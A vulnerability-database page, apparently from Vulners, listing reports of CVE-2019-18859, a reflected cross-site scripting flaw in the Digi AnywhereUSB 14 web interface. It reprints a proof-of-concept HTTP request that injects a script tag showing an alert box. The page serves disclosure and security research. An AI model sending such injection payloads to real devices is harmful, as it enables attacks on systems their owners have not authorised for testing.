Digi AnywhereUSB 14 - Reflective Cross-Site Scripting. Vulnerability allows injection of malicious code
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
exploitpack | Digi AnywhereUSB 14 - Reflective Cross-Site Scripting | 13 Jan 202000:00 | – | exploitpack |
0day.today | Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Vulnerability | 13 Jan 202000:00 | – | zdt |
Prion | Design/Logic Flaw | 9 Jan 202021:15 | – | prion |
Cvelist | CVE-2019-18859 | 9 Jan 202020:07 | – | cvelist |
CVE | CVE-2019-18859 | 9 Jan 202021:15 | – | cve |
Packet Storm | Digi AnywhereUSB 14 Cross Site Scripting | 13 Jan 202000:00 | – | packetstorm |
NVD | CVE-2019-18859 | 9 Jan 202021:15 | – | nvd |
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859
# PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
# Author Website: HTTPS://RNPG.info
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo